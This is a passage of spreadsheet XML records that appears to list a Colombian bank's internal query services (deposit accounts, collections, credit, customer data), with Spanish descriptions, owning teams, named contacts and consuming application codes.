    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0084001 _x000d__x000a_AW1258011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Archivos Enviados Recaudador"/>
    <n v="100"/>
    <x v="0"/>
    <s v="La API permite listar los archivos que el core de recaudos le ha enviado al recaudador, estos pueden contener información sobre los recaudos que fueron captadas (consolidado o tiempo real) o novedades"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Banco"/>
    <n v="100"/>
    <x v="0"/>
    <s v="_x000a_El servicio permite consultar desde las filiares del exterior (Bancolombia Panamá, sucursal Panamá, Bancolombia puerto rico y Bancolombia cayman) los bancos del exterior que se encuentran asociados a estas. _x000a_"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Finacle - F.E_Panama_AW0709001"/>
    <s v="AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Caracteristicas Plan Cuenta"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El Servicio ConsultaCaracteristicasPlanCuenta  habilita las capacidades que permite consultar las características del plan de una cuenta de ahorros o corriente. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0091001 _x000d__x000a_NU0170001 _x000d__x000a_AW1177001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Catalogo Maestros"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Catalogo Maestros, permite consultar los catálogos de valores de los distintos atributos de los datos de información de cliente. Conteniendo la llave-valor, de los códigos y descripciones de los maestros del banco.  (Ejemplo: Cargos, Profesiones del cliente, entre otros)."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW1074001 _x000d__x000a_NU0038001 _x000d__x000a_NU0051001 _x000d__x000a_AW1249001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Catalogo Servicios Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite consultar el catálogo de servicios disponibles en Depósitos para procesar transacciones de forma masiva o por lotes."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Catalogos Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El Servicio ConsultaCatalogosDepositos habilita la consulta de los catálogos pertenecientes a las cuentas de depósito incluyendo bolsillos. permitirá a los consumidores consultar datos de referencia que se comportan como catálogos. Inicialmente, se habilita la consulta de transacciones que se pueden aplicar en los movimientos monetarios para los bolsillos"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Centrales Internas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio “Consulta Centrales Internas” ofrece la capacidad de recolectar y calcular la información interna del comportamiento crediticio de un cliente en el banco, como es: Factoring, SUFI, Leasing, Bancolombia. Donde posteriormente, se realiza la calificación según las reglas definidas y previamente configuradas; obteniendo un rechazo o aprobación de dicha solicitud."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Clasificacion Cartera"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaClasificacionCartera, en su versión inicial, cuenta con la capacidad de consultar la clasificación del tipo de cartera para un crédito lo cual hace posible medir el riesgo en el otorgamiento de éste."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1285001 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cliente Preferencial FNG"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite consultar si una Pyme(persona natural o jurídica) que ha sido o está garantizada por el fondo nacional de garantías, hace parte de la base de clientes preferentes, al mismos tiempo entrega la información del cupo disponible."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Jornadas"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Fondo Nacional de Garantias"/>
    <s v="AW1285001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Clientes"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaClientes permitirá la consulta de información de clientes de factoring en varios niveles de detalle."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Factoring"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Factoring"/>
    <s v="Lucas Daniel Betancourt"/>
    <m/>
    <s v="Solicitudes de Vinculación_Sucursal Virtual Factoring_AW0423001"/>
    <s v="AW0922 _x000d__x000a_TP _x000d__x000a_Allus"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Comision Canales"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite la consulta de las comisiones que se cobran en los canales digitales banco, en base a la transacción que el cliente realiza desde un canal, a la que se asigna un código especifico parametrizado desde ITC, como por ejemplo una transferencia a otro banco, transferencias de fondos, transferencias cuenta Nequi, etc."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="NU0021001 _x000d__x000a_AW1170 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW0955001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001 _x000d__x000a_NU0215001 _x000d__x000a_NU0051001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Consolidados Cuentas Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio que permite a los clientes realizar las consultas de consolidados de cuentas de depósito. Estos consolidados pueden ser de diferentes tipos: consolidados de movimientos, consolidados de saldos, etc. Esto facilita a los clientes consumidores del servicio temas como la representación gráfica en cifras de las cuentas de depósito. Las cuentas de depósito hacen referencia a las cuentas de ahorro y las cuentas corriente del Grupo Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Convenio Nomina"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio de Consulta Convenio Nomina proporciona a los consumidores, capacidades para obtener información relevante de los Convenios de Nómina, como el grupo de cobro, el tipo de plan, nombre de empleador, nombre del pagador entre otros. Ofrece la posibilidad de realizar la consulta por Nit, por número de convenio o por ambos al mismo tiempo."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_AW1285001 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Convenio Recaudo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Convenio Recaudo permitirá listar y validar la información detallada de los convenios de recaudos. Está operación es vital para el funcionamiento de las apis de recaudos, ya que permite en cual de los dos core se encuentra la información del recaudo y además permitirá identificar el comportamiento de la mismo."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0021001 _x000d__x000a_AW1176 _x000d__x000a_AW1258011 _x000d__x000a_NU0051001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Convenios De Nomina"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Convenios de nómina permitirá obtener información de los convenios, la información podrá ser buscada por pagador, empleador o beneficiario, retornando información como tal del convenio y plan asociado.  "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0091001 _x000d__x000a_NU0169001 _x000d__x000a_NU0170001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Costos Tarjeta Debito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="A través de este servicio, se pueden consultar los costos asociados a una tarjeta débito, como por ejemplo el valor de la cuota de manejo o el costo de reexpedir una tarjeta, etc."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_AW1128 _x000d__x000a_NU0170001 _x000d__x000a_NU0104001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuenta Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v=" El servicio requerido en el Broker es una virtualización de operaciones que se van a exponer, ya sea en Bankvision (BV) o a futuro en cualquier otro aplicativo de productos del tipo depósitos, relacionadas con la consulta de Cuentas de Ahorro y Corrientes._x005f_x000D_ Este servicio cuando es consumido, devuelve la información detallada de una cuenta de ahorro o corriente, como por ejemplo, saldos disponibles, estado de la cuenta, numero de cotitulares de la cuenta, entre otra información detallada que se usa diariamente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AW01065"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuenta Depositos"/>
    <n v="200"/>
    <x v="0"/>
    <s v=" El servicio requerido en el Broker es una virtualización de operaciones que se van a exponer, ya sea en Bankvision (BV) o a futuro en cualquier otro aplicativo de productos del tipo depósitos, relacionadas con la consulta de Cuentas de Ahorro y Corrientes._x005f_x000D_ Este servicio cuando es consumido, devuelve la información detallada de una cuenta de ahorro o corriente, como por ejemplo, saldos disponibles, estado de la cuenta, numero de cotitulares de la cuenta, entre otra información detallada que se usa diariamente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AW01065 _x000d__x000a_AW0937 _x000d__x000a_SU2 _x000d__x000a_AW1176 _x000d__x000a_AW0856 _x000d__x000a_SUF _x000d__x000a_AW1272001 _x000d__x000a_AW1170 _x000d__x000a_AFC _x000d__x000a_AW0709001 _x000d__x000a_AW1311 _x000d__x000a_AW1365 _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuenta MultiProducto"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaCuentaMultiProducto permitirá a los consumidores consultar las cuentas multi producto asociadas a un cliente en específico en valores, adicionalmente podrá consultar la información de cuentas inscritas en valores y el histórico de cada cuenta."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1208001 _x000d__x000a_AW1208 _x000d__x000a_AW1298001 _x000d__x000a_NU0160001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuenta Recaudo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite consultar información de la cuenta del recaudo para conocer si es o no exclusiva para recaudo"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1258011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuentas AFC"/>
    <n v="100"/>
    <x v="0"/>
    <s v=" Consulta que permite presentar al cliente información relacionada con su estado de cuenta AFC, tal como su valor ahorrado, beneficios ganados y perdidos, saldo disponible para vivienda y saldo disponible para diferente de vivienda, etc. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <s v="CUENTAS AFC_AW1110001"/>
    <s v="GDE _x000d__x000a_AFC _x000d__x000a_AW1110001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuentas Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Esta versión habilita las capacidades de consulta para cuentas de ahorro y corriente, el servicio permite a los consumidores consultar por medio de operaciones que devuelven la información básica y detallada según se requiera, adicionalmente tiene capacidades como listar las cuentas de las que es titular un cliente listar las cuentas canceladas y listar participantes."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW1373 _x000d__x000a_NU0104001 _x000d__x000a_NU0064001 _x000d__x000a_AW1315014 _x000d__x000a_NU0010001 _x000d__x000a_AW1258011 _x000d__x000a_NU0139001 _x000d__x000a_AW1365 _x000d__x000a_NU0014001 _x000d__x000a_AW1326001 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_AW1315001 _x000d__x000a_NU0091001 _x000d__x000a_NU0146001 _x000d__x000a_AW1151001 _x000d__x000a_NU0001001 _x000d__x000a_AW0360006 _x000d__x000a_NU0142001 _x000d__x000a_NU0135001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuota Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite consultar el pago periódico que se compromete a realizar un cliente al banco con el fin de devolver el financiamiento  que se le otorgó._x000a_En la cuota se pueden distinguir dos componentes. El primero corresponde al reintegro de parte del capital prestado (Valor de la cuota) mientras que el otro concierne a los intereses generados (Tasa nominal mes vencido, Tasa efectiva anual, Valor numérico de la DTF_x000a_"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="AW1313 _x000d__x000a_AW1170 _x000d__x000a_AW1287"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuota Credito"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Este servicio permite consultar el pago periódico que se compromete a realizar un cliente al banco con el fin de devolver el financiamiento que se le otorgó. En la cuota se pueden distinguir tres componentes. El primero corresponde al reintegro de parte del capital prestado (saldo) el segundo concierne a los intereses generados (interés fijo) y la tercera parte es la de los seguros (retenciones)."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="NU0102001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Alertas y Notificaciones"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite consultar la siguiente información de un cliente:  - Mecanismo por medio el cual un cliente Bancolombia esta enrolado a clave dinámica, el cual puede variar entre ODA y Softoken. - Datos de contacto que fueron proporcionados por un cliente Bancolombia y/o un cliente de Bancolombia a la mano, como lo son número de celular y correo electrónico autorizados para recibir notificaciones.  La anterior información se encuentra almacenada en el sistema de Alertas y Notificaciones."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Alertas_ISPCC0002"/>
    <s v="NU0102001 _x000d__x000a_AW0407 _x000d__x000a_AW1313 _x000d__x000a_AW1316001 _x000d__x000a_AW0360007 _x000d__x000a_AW1170 _x000d__x000a_NU0100001 _x000d__x000a_NU0004001 _x000d__x000a_NU0103001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1185001 _x000d__x000a_AW1316 _x000d__x000a_NU0147001 _x000d__x000a_NU0104001 _x000d__x000a_NU0170001 _x000d__x000a_AW0955001 _x000d__x000a_AW1299001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Cartera"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio tiene como alcance, la consulta de datos expuestos desde Cartera Bancolombia,  como datos del Maestro de Limites, Garatias, etc.  Dicho servicio será utilizado como primer alcance, en el proceso de Estudio de Crédito Unificado, dirigido a clientes Empresariales y Pymes Gerenciados, para las líneas de Negocio de BANCOLOMBIA, LEASING FACTORING. Las operaciones que serán implementadas como alcance del proyecto ECU Colombia serán la consulta de Cupos Bancolombia y Factotin y la consulta de Garantias"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="NU0102001 _x000d__x000a_AW1176 _x000d__x000a_AW0856 _x000d__x000a_AW1313 _x000d__x000a_AW1294001 _x000d__x000a_NU0114001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Cliente Sufi"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite la recuperación de la información de los clientes de SUFI, información relacionada con sus datos personales, información económica e información de contacto. A este servicio se le especifica una sola operación, a futuro se espera agregar mas operaciones que permita la consulta segmentada de toda la información de un Cliente; por ejemplo consulta de la información financiera"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="Servicio Web Cliente Sufi_AW1083001"/>
    <s v="ISSU20003 _x000d__x000a_AW1312001 _x000d__x000a_NU0204001 _x000d__x000a_NU0093001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Comerciales Sucursal"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio que permite consultar información sobre los códigos de la sucursal, del Gerente y/o asesor de una sucursal, permite realizar búsquedas por el código CIF de la sucursal, el código CIF o la cédula de un asesor."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <s v="RSA-RELACIÓN SUCURSAL ASESOR_AW1242001"/>
    <s v="AW1177 _x000d__x000a_AW1313001 _x000d__x000a_AW0856 _x000d__x000a_AW1299001 _x000d__x000a_AW1176001 _x000d__x000a_AW1128 _x000d__x000a_AW1249 _x000d__x000a_AW1249001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Complementarios Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite consultar información que es complementaria del cliente, estos datos corresponden a la calificación de riesgo interna, calificación interna, cliente tesorería, entre otros. "/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0899001 _x000d__x000a_AW1074001 _x000d__x000a_SVP _x000d__x000a_NU0038001 _x000d__x000a_AW1285001 _x000d__x000a_AW1176 _x000d__x000a_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Contacto Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite consultar información para realizar el contacto con los clientes, se retornar datos como, por ejemplo: dirección de residencia, teléfonos, email, entre otros. El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente, documento externo o con tipo y número de documento original del cliente. La información que se retorna corresponde a los datos maestros del cliente Bancolombia Colombia."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="NU0102001 _x000d__x000a_NU0098001 _x000d__x000a_AW0360004 _x000d__x000a_AW0748001 _x000d__x000a_AW1281002 _x000d__x000a_NU0143001 _x000d__x000a_AW1074001 _x000d__x000a_SVP _x000d__x000a_AW0611001 _x000d__x000a_AW1206001 _x000d__x000a_AW0360007 _x000d__x000a_NU0104001 _x000d__x000a_AW1302001 _x000d__x000a_NU0004001 _x000d__x000a_NU0064001 _x000d__x000a_AW1281003 _x000d__x000a_NU0010001 _x000d__x000a_AW1313001 _x000d__x000a_NU0035001 _x000d__x000a_AW1151001 _x000d__x000a_NU0046001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001 _x000d__x000a_NU0142001 _x000d__x000a_AW1326001 _x000d__x000a_AW1365 _x000d__x000a_AW1218001 _x000d__x000a_AW1285001 _x000d__x000a_NU0170001 _x000d__x000a_AW1176 _x000d__x000a_AW0660001 _x000d__x000a_AW0661003 _x000d__x000a_NU0152001 _x000d__x000a_AW1272001 _x000d__x000a_AW1480001 _x000d__x000a_NU0219001 _x000d__x000a_NU0091001 _x000d__x000a_NU0254001 _x000d__x000a_NU0139001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Financieros Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio sirve para consultar la información financiera de los clientes (ejemplo: Ingresos, Egresos, Pasivos, Activos, entre otros). El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente, documento externo o con tipo y número de documento original del cliente. La información que se retorna corresponde a los datos maestros del cliente Bancolombia Colombia."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0748001 _x000d__x000a_AW1285001 _x000d__x000a_AW0661003 _x000d__x000a_NU0254001 _x000d__x000a_AW1074001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Personales Cliente"/>
